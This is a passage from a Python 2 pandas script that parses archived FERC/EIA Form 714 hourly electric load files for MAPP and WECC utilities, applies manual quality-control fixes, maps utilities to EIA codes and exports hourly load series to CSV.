        1998 : pd.read_fwf('%s/mapp/1998/LES98' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1999 : pd.read_fwf('%s/mapp/1999/LES99' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        2000 : pd.read_excel('%s/mapp/2000/LES00' % (fulldir), skipfooter=3).iloc[:, 1:].values.ravel(),
        2001 : pd.read_excel('%s/mapp/2001/LES01' % (fulldir), skipfooter=3).iloc[:, 1:].values.ravel(),
        2002 : pd.read_fwf('%s/mapp/2002/LES02' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        2003 : pd.read_fwf('%s/mapp/2003/LES03' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel()
    },
    12647 : {
        1995 : pd.read_fwf('%s/mapp/1995/MPL95' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        2000 : pd.read_fwf('%s/mapp/2000/MPL00' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        2001 : pd.read_fwf('%s/mapp/2001/MPL01' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel()
    },
    12658 : {
        1993 : pd.read_fwf('%s/mapp/1993/MPC93' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1994 : pd.read_fwf('%s/mapp/1994/MPC94' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1995 : pd.read_fwf('%s/mapp/1995/MPC95' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1996 : pd.read_fwf('%s/mapp/1996/MPC96' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1997 : pd.read_fwf('%s/mapp/1997/MPC97' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1998 : pd.read_fwf('%s/mapp/1998/MPC98' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1999 : pd.read_fwf('%s/mapp/1999/MPC99' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        2002 : pd.read_fwf('%s/mapp/2002/MPC02' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        2003 : pd.read_fwf('%s/mapp/2003/MPC03' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel()
    },
    12819 : {
        1993 : pd.read_fwf('%s/mapp/1993/MDU93' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1994 : pd.read_fwf('%s/mapp/1994/MDU94' % (fulldir), widths=_mapp_w2, header=None).iloc[:-1, _mapp_hours].values.ravel(),
        1995 : pd.read_fwf('%s/mapp/1995/MDU95' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1996 : pd.read_fwf('%s/mapp/1996/MDU96' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1997 : pd.read_fwf('%s/mapp/1997/MDU97' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1998 : pd.read_fwf('%s/mapp/1998/MDU98' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1999 : pd.read_fwf('%s/mapp/1999/MDU99' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        2002 : pd.read_fwf('%s/mapp/2002/MDU02' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        2003 : pd.read_fwf('%s/mapp/2003/MDU03' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel()
    },
    21352 : {
        1993 : pd.read_fwf('%s/mapp/1993/MEAN93' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1995 : pd.read_fwf('%s/mapp/1995/MEAN95' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).dropna().values.ravel(),
        1996 : pd.read_fwf('%s/mapp/1996/MEAN96' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).dropna().values.ravel(),
        1997 : pd.read_fwf('%s/mapp/1997/MEAN97' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).dropna().values.ravel(),
        1998 : pd.read_fwf('%s/mapp/1998/MEAN98' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).dropna().values.ravel(),
        1999 : pd.read_fwf('%s/mapp/1999/MEAN99' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).dropna().values.ravel(),
        2002 : pd.read_fwf('%s/mapp/2002/MEAN02' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        2003 : pd.read_fwf('%s/mapp/2003/MEAN03' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel()
    },
    13143 : {
        1993 : pd.read_fwf('%s/mapp/1993/MPW93' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1994 : pd.read_fwf('%s/mapp/1994/MPW94' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1995 : pd.read_fwf('%s/mapp/1995/MPW95' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1996 : pd.read_fwf('%s/mapp/1996/MPW96' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1997 : pd.read_fwf('%s/mapp/1997/MPW97' % (fulldir), widths=_mapp_w2, header=None).iloc[:-1, _mapp_hours].values.ravel(),
        1998 : pd.read_fwf('%s/mapp/1998/MPW98' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1999 : pd.read_fwf('%s/mapp/1999/MPW99' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        2002 : pd.read_fwf('%s/mapp/2002/MPW02' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        2003 : pd.read_fwf('%s/mapp/2003/MPW03' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel()
    },
    13337 : {
        1993 : pd.read_fwf('%s/mapp/1993/NPPD93' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1994 : pd.read_fwf('%s/mapp/1994/NPPD94' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1995 : pd.read_fwf('%s/mapp/1995/NPPD95' % (fulldir), widths=_mapp_w1, header=None, skiprows=6).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1996 : pd.read_fwf('%s/mapp/1996/NPPD96' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1997 : pd.read_fwf('%s/mapp/1997/NPPD97' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1998 : pd.read_fwf('%s/mapp/1998/NPPD98' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1999 : pd.read_fwf('%s/mapp/1999/NPPD99' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        2000 : pd.read_fwf('%s/mapp/2000/NPPD00' % (fulldir), widths=_mapp_w1, header=None, skiprows=9, skipfooter=1).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        2001 : pd.read_fwf('%s/mapp/2001/NPPD01' % (fulldir), widths=_mapp_w1, header=None, skiprows=9, skipfooter=1).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        2002 : pd.read_csv('%s/mapp/2002/NPPD02' % (fulldir), sep='\t', skipinitialspace=True, header=None).iloc[:, 2:].values.ravel(),
        2003 : pd.read_fwf('%s/mapp/2003/NPPD03' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel()
    },
    13781 : {
        1993 : pd.read_fwf('%s/mapp/1993/NSP93' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1994 : pd.read_fwf('%s/mapp/1994/NSP94' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1996 : pd.read_fwf('%s/mapp/1996/NSP96' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1997 : pd.read_fwf('%s/mapp/1997/NSP97' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1998 : pd.read_fwf('%s/mapp/1998/NSP98' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1999 : pd.read_fwf('%s/mapp/1999/NSP99' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        2000 : pd.read_csv('%s/mapp/2000/NSP00' % (fulldir), sep='\t', skipinitialspace=True, skiprows=2, header=None, skipfooter=1)[2].values
    },
    13809 : {
        1993 : pd.read_fwf('%s/mapp/1993/NWPS93' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1995 : pd.read_fwf('%s/mapp/1995/NWPS95' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1996 : pd.read_fwf('%s/mapp/1996/NWPS96' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1997 : pd.read_fwf('%s/mapp/1997/NWPS97' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1998 : pd.read_fwf('%s/mapp/1998/NWPS98' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1999 : pd.read_fwf('%s/mapp/1999/NWPS99' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        2002 : pd.read_fwf('%s/mapp/2002/NWPS02' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        2003 : pd.read_fwf('%s/mapp/2003/NWPS03' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel()
    },
    14127 : {
        1993 : pd.read_fwf('%s/mapp/1993/OPPD93' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1994 : pd.read_fwf('%s/mapp/1994/OPPD94' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1995 : pd.read_csv('%s/mapp/1995/OPPD95' % (fulldir), sep='\t', skipinitialspace=True, header=None).iloc[:, 7:].values.ravel(),
        1996 : pd.read_fwf('%s/mapp/1996/OPPD96' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1997 : pd.read_fwf('%s/mapp/1997/OPPD97' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1998 : pd.read_fwf('%s/mapp/1998/OPPD98' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1999 : pd.read_fwf('%s/mapp/1999/OPPD99' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        2002 : pd.read_fwf('%s/mapp/2002/OPPD02' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        2003 : pd.read_fwf('%s/mapp/2003/OPPD03' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].dropna().values.ravel()
    },
    14232 : {
        1993 : pd.read_fwf('%s/mapp/1993/OTP93' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1994 : pd.read_fwf('%s/mapp/1994/OTP94' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1995 : pd.read_csv('%s/mapp/1995/OTP95' % (fulldir), header=None).iloc[:, -2].values.ravel(),
        1996 : pd.read_fwf('%s/mapp/1996/OTP96' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1997 : pd.read_fwf('%s/mapp/1997/OTP97' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1998 : pd.read_fwf('%s/mapp/1998/OTP98' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1999 : pd.read_fwf('%s/mapp/1999/OTP99' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        2000 : pd.read_fwf('%s/mapp/2000/OTP00' % (fulldir), widths=_mapp_w1, header=None, skiprows=2).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        2002 : pd.read_fwf('%s/mapp/2002/OTP02' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].dropna().values.ravel(),
        2003 : pd.read_fwf('%s/mapp/2003/OTP03' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].dropna().values.ravel()
    },
    40580 : {
        1993 : pd.read_fwf('%s/mapp/1993/SMMP93' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].dropna().values.ravel(),
        1994 : pd.read_fwf('%s/mapp/1994/SMP94' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1996 : pd.read_fwf('%s/mapp/1996/SMMP96' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1997 : pd.read_fwf('%s/mapp/1997/SMMP97' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1998 : pd.read_fwf('%s/mapp/1998/SMMP98' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1999 : pd.read_fwf('%s/mapp/1999/SMMPA99' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        2000 : pd.read_csv('%s/mapp/2000/SMMP00' % (fulldir)).iloc[:-1, 3].values,
        2001 : pd.read_csv('%s/mapp/2001/SMMP01' % (fulldir), header=None).iloc[:, 2].values,
        2002 : pd.read_fwf('%s/mapp/2002/SMMPA02' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].dropna().values.ravel(),
        2003 : pd.read_fwf('%s/mapp/2003/SMMPA03' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].dropna().values.ravel()
    },
    19514 : {
        1993 : pd.read_fwf('%s/mapp/1993/UPA93' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].dropna().values.ravel(),
        1994 : pd.read_fwf('%s/mapp/1994/UPA94' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].dropna().values.ravel(),
        1996 : pd.read_fwf('%s/mapp/1996/UPA96' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].dropna().values.ravel(),
        1997 : pd.read_fwf('%s/mapp/1997/UPA97' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].dropna().values.ravel(),
        1998 : pd.read_fwf('%s/mapp/1998/UPA98' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].dropna().values.ravel()
    },
    20858 : {
        1993 : pd.read_fwf('%s/mapp/1993/WPPI93' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].dropna().values.ravel(),
        1994 : pd.read_fwf('%s/mapp/1994/WPPI94' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].dropna().values.ravel(),
        1996 : pd.read_fwf('%s/mapp/1996/WPPI96' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1997 : pd.read_csv('%s/mapp/1997/WPPI97' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 2:-1].values.ravel(),
        1998 : pd.read_fwf('%s/mapp/1998/WPPI98' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1999 : pd.read_fwf('%s/mapp/1999/WPPI99' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        2002 : pd.read_fwf('%s/mapp/2002/WPPI02' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].dropna().values.ravel(),
        2003 : pd.read_fwf('%s/mapp/2003/WPPI03' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].dropna().values.ravel()
    },
    12341 : {
        1995 : pd.read_fwf('%s/mapp/1995/MEC95' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1996 : pd.read_fwf('%s/mapp/1996/MEC96' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1997 : pd.read_fwf('%s/mapp/1997/MEC97' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].dropna().values.ravel(),
        1998 : pd.read_fwf('%s/mapp/1998/MEC98' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1999 : pd.read_fwf('%s/mapp/1999/MEC99' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        2000 : pd.read_fwf('%s/mapp/2000/MEC00' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        2002 : pd.read_fwf('%s/mapp/2002/MEC02' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].dropna().values.ravel(),
        2003 : pd.read_fwf('%s/mapp/2003/MEC_ALL03' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].dropna().values.ravel()
    },
    23333 : {
        1993 : pd.read_fwf('%s/mapp/1993/MPSI93' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1994 : pd.read_fwf('%s/mapp/1994/MPSI94' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1995 : pd.read_fwf('%s/mapp/1995/MPSI95' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel()
    }
}
# Manual QC fixes for known-bad MAPP series (grounded in inspection of the
# raw archives — specifics to confirm against source files):
mapp[20858][1997] = np.repeat(np.nan, len(mapp[20858][1997]))  # 1997 series blanked out (judged unusable)
mapp[21352][1995][mapp[21352][1995] < 0] = 0  # negative loads presumably bad reads — clamped to 0
mapp[40580][2000] = np.repeat(np.nan, len(mapp[40580][2000]))  # 2000 series blanked out (judged unusable)
if not os.path.exists('./mapp'):
    os.mkdir('mapp')
# Export one CSV per utility: place each year's flat hourly array on an
# hourly DatetimeIndex starting Jan 1 of that year, concatenate the years,
# sort chronologically, and convert 0 (the archives' missing marker) to NaN.
for k in mapp.keys():
    print k
    s = pd.DataFrame(pd.concat([pd.Series(mapp[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(mapp[k][i]))) for i in mapp[k].keys()]).sort_index(), columns=['load'])
    s['load'] = s['load'].astype(float).replace(0, np.nan)
    s.to_csv('./mapp/%s.csv' % k)
#################################
# WECC
#################################
import numpy as np
import pandas as pd
import os
import re
import datetime
import time
import pysal as ps
homedir = os.path.expanduser('~')
#basepath = '/home/akagi/Documents/EIA_form_data/wecc_form_714'
basepath = '%s/github/RIPS_kircheis/data/eia_form_714/active' % (homedir)
# Year -> data directory (or, for 2006, the combined FERC 714 CSV) relative
# to `basepath`.  2005 is absent from the archive.
path_d = {
    1993: '93WSCC1/WSCC',
    1994: '94WSCC1/WSCC1994',
    1995: '95WSCC1',
    1996: '96WSCC1/WSCC1996',
    1997: '97wscc1',
    1998: '98WSCC1/WSCC1',
    1999: '99WSCC1/WSCC1',
    2000: '00WSCC1/WSCC1',
    2001: '01WECC/WECC01/wecc01',
    2002: 'WECCONE3/WECC One/WECC2002',
    2003: 'WECC/WECC/WECC ONE/wecc03',
    2004: 'WECC_2004/WECC/WECC One/ferc',
    2006: 'form714-database_2006_2013/form714-database/Part 3 Schedule 2 - Planning Area Hourly Demand.csv'
}
#### GET UNIQUE UTILITIES AND UTILITIES BY YEAR
# u_by_year: year -> sorted list of utility file-name stems (lowercased, with
# the two-digit year suffix stripped).  2006 is skipped because that year is a
# single combined CSV rather than per-utility .dat files.
u_by_year = {}
for d in path_d:
    if d != 2006:
        full_d = basepath + '/' + path_d[d]
        l = [i.lower().split('.')[0][:-2] for i in os.listdir(full_d) if i.lower().endswith('dat')]
        u_by_year.update({d : sorted(l)})
unique_u = np.unique(np.concatenate([np.array(i) for i in u_by_year.values()]))
#### GET EIA CODES OF WECC UTILITIES
# Year -> README file (relative to `basepath`) that lists each utility's data
# file name, EIA code and full name for that year.
rm_d = {1993: {'rm': '93WSCC1/README2'},
        1994: {'rm': '94WSCC1/README.TXT'},
        1995: {'rm': '95WSCC1/README.TXT'},
        1996: {'rm': '96WSCC1/README.TXT'},
        1997: {'rm': '97wscc1/README.TXT'},
        1998: {'rm': '98WSCC1/WSCC1/part.002'},
        1999: {'rm': '99WSCC1/WSCC1/README.TXT'},
        2000: {'rm': '00WSCC1/WSCC1/README.TXT'},
        2001: {'rm': '01WECC/WECC01/wecc01/README.TXT'},
        2002: {'rm': 'WECCONE3/WECC One/WECC2002/README.TXT'},
        2003: {'rm': 'WECC/WECC/WECC ONE/wecc03/README.TXT'},
        2004: {'rm': 'WECC_2004/WECC/WECC One/ferc/README.TXT'}}
# Record section boundaries in each year's README: 'op' is the line index of
# the "FILE NAME" table header, 'ed' the line mentioning both "FERC" and
# "not" (the trailing disclaimer).  These indices are stored for optional
# slicing of the README later (see the commented-out slice below).
for d in rm_d.keys():
    fn = basepath + '/' + rm_d[d]['rm']
    # Use a context manager so the file handle is closed even on error.
    with open(fn, 'r') as f:
        r = f.readlines()
    for i in range(len(r)):
        if 'FILE NAME' in r[i]:
            rm_d[d].update({'op': i})
        # Bug fix: the original condition was "'FERC' and 'not' in r[i]",
        # which evaluates as just "'not' in r[i]" because the non-empty
        # literal 'FERC' is always truthy.  Require both substrings.
        if 'FERC' in r[i] and 'not' in r[i]:
            rm_d[d].update({'ed': i})
# Map each utility stem to its EIA code and full name by scanning the yearly
# READMEs for a line beginning "<stem>YY.dat"; such lines are formatted as
# "<file> <code> <name...>".  The first match found across years wins.
unique_u_ids = {}
for u in unique_u:
    regex = re.compile('^ *%s\d\d.dat' % u, re.IGNORECASE)
    for d in rm_d.keys():
        fn = basepath + '/' + rm_d[d]['rm']
        f = open(fn, 'r')
        r = f.readlines()  #[rm_d[d]['op']:rm_d[d]['ed']]
        f.close()
        for line in r:
            result = re.search(regex, line)
            if result:
                # print line
                # Second whitespace token is the EIA code; everything after
                # the code on the line is the utility's name.
                code = line.split()[1]
                nm = line.split(code)[1].strip()
                unique_u_ids.update({u : {'code':code, 'name':nm}})
                break
            else:
                continue
        # Stop scanning further years once this utility has been resolved.
        if u in unique_u_ids:
            break
        else:
            continue
#id_2006 = pd.read_csv('/home/akagi/Documents/EIA_form_data/wecc_form_714/form714-database_2006_2013/form714-database/Respondent IDs.csv')
# Join the README-derived EIA codes against the 2006+ FERC respondent table
# so pre-2006 utilities can be matched to 2006+ respondent_id values.
id_2006 = pd.read_csv('%s/form714-database_2006_2013/form714-database/Respondent IDs.csv' % (basepath))
id_2006 = id_2006.drop_duplicates('eia_code').set_index('eia_code').sort_index()
ui = pd.DataFrame.from_dict(unique_u_ids, orient='index')
# '*' marks utilities whose code could not be parsed from the README.
ui = ui.loc[ui['code'] != '*'].drop_duplicates('code')
ui['code'] = ui['code'].astype(int)
ui = ui.set_index('code')
# eia_to_r: indexed by EIA code, with the utility name plus respondent_id.
eia_to_r = pd.concat([ui, id_2006], axis=1).dropna()
# util = {
#         'aps' : 803,
#         'srp' : 16572,
#         'ldwp' : 11208
#         }
# util_2006 = {
#         'aps' : 116,
#         'srp' : 244,
#         'ldwp' : 194
#         }
#resp_ids = '/home/akagi/Documents/EIA_form_data/wecc_form_714/form714-database_2006_2013/form714-database/Respondent IDs.csv'
resp_ids = '%s/form714-database_2006_2013/form714-database/Respondent IDs.csv' % (basepath)
df_path_d = {}
def build_paths():
  """Populate the module-level df_path_d: utility stem -> {year: file path}.

  For pre-2006 years, finds each utility's '<stem>YY.dat' file inside the
  year's directory by regex-matching the directory listing.  For 2006 every
  utility maps to the single combined CSV.  Mutates df_path_d in place.
  """
  for y in path_d.keys():
    if y < 2006:
      pathstr = basepath + '/' + path_d[y]
      dirstr = ' '.join(os.listdir(pathstr))
      # print dirstr
      for u in u_by_year[y]:
        if not u in df_path_d:
          df_path_d.update({u : {}})
        srcstr = '%s\d\d.dat' % (u)
        # print srcstr
        match = re.search(srcstr, dirstr, re.I)
        # print type(match.group())
        # NOTE(review): match is assumed to succeed because u came from this
        # directory listing; a rename between scans would raise here.
        rpath = pathstr + '/' + match.group()
        df_path_d[u].update({y : rpath})
    elif y == 2006:
      pathstr = basepath + '/' + path_d[y]
      for u in unique_u:
        if not u in df_path_d:
          df_path_d.update({u : {}})
        df_path_d[u].update({y : pathstr})
df_d = {}
def build_df(u):
  """Build an hourly load DataFrame for utility stem `u` across all years.

  Pre-2006 files are fixed-width FERC 714 text: each day is a pair of lines
  (AM hours / PM hours), 20 header chars then twelve 5-char load fields.
  2006 data is pulled from the combined CSV by respondent_id.  Returns a
  DataFrame with a DatetimeIndex and a single 'load' column.
  """
  print u
  df = pd.DataFrame()
  for y in sorted(df_path_d[u].keys()):
    print y
    if y < 2006:
      f = open(df_path_d[u][y], 'r')
      r = f.readlines()
      f.close()
      #### DISCARD BINARY-ENCODED FILES
      # If the first line fails to decode, the file is treated as binary and
      # skipped entirely (enc stays None so the `if enc:` block is skipped).
      try:
        enc = r[0].decode()
      except:
        enc = None
        pass
      if enc:
        # Keep only full-width data lines; normalize tabs to spaces.
        r = [g.replace('\t', ' ') for g in r if len(g) > 70]
        # Skip any preamble until the first line that is all digits
        # (a MMDDYY.. data header line).
        if not str.isdigit(r[0][0]):
          for line in range(len(r)):
            try:
              chk = int(''.join(r[line].rstrip().split()))
              if chk:
                # print line, r[line]
                r = r[line:]
                break
            except:
              continue
        # Consume the file two lines (one day) at a time.
        for i in range(0, len(r)-1, 2):
          # print i
          entry = [r[i], r[i+1]]
          mo = int(r[i][:2])
          day = int(r[i][2:4])
          yr = y
          # yr = r[i][4:6]
          # if yr[0] == '0':
          #     yr = int('20' + yr)
          # else:
          #     yr = int('19' + yr)
          # Exactly 160 significant chars means strict fixed-width layout:
          # parse twelve 5-char fields; otherwise fall back to whitespace
          # splitting (and vice versa), padding/truncating to 12 values.
          if (len(entry[0].rstrip()) + len(entry[1].rstrip())) == 160:
            try:
              am = [int(j) if j.strip() != '' else None for j in re.findall('.{5}', entry[0][20:].rstrip())]
              pm = [int(j) if j.strip() != '' else None for j in re.findall('.{5}', entry[1][20:].rstrip())]
              assert(len(am)==12)
              assert(len(pm)==12)
            except:
              am = [int(j) for j in entry[0][20:].rstrip().split()]
              pm = [int(j) for j in entry[1][20:].rstrip().split()]
              assert(len(am)==12)
              assert(len(pm)==12)
          else:
            try:
              am = [int(j) for j in entry[0][20:].rstrip().split()]
              pm = [int(j) for j in entry[1][20:].rstrip().split()]
              assert(len(am)==12)
              assert(len(pm)==12)
            except:
              try:
                am = [int(j) if j.strip() != '' else None for j in re.findall('.{5}', entry[0][20:].rstrip())]
                pm = [int(j) if j.strip() != '' else None for j in re.findall('.{5}', entry[1][20:].rstrip())]
                if len(am) < 12:
                  am_arr = np.array(am)
                  am = np.pad(am_arr, (0, (12 - np.array(am).shape[0])), mode='symmetric').tolist()
                if len(pm) < 12:
                  pm_arr = np.array(pm)
                  pm = np.pad(pm_arr, (0, (12 - np.array(pm).shape[0])), mode='symmetric').tolist()
                if len(am) > 12:
                  am = am[:12]
                if len(pm) > 12:
                  pm = pm[:12]
              except:
                print 'Cannot read line'
                am = np.repeat(np.nan, 12).tolist()
                pm = np.repeat(np.nan, 12).tolist()
          ampm = am + pm
          entry_df = pd.DataFrame()
          # If the parsed month/day is invalid, fall back to continuing
          # 24 hours after the last appended timestamp.
          try:
            dt_ix = pd.date_range(start=datetime.datetime(yr, mo, day, 0), end=datetime.datetime(yr, mo, day, 23), freq='H')
            entry_df['load'] = ampm
            # print entry_df
            entry_df.index = dt_ix
            df = df.append(entry_df)
          except:
            entry_df['load'] = ampm
            yest = df.index.to_pydatetime()[-1]
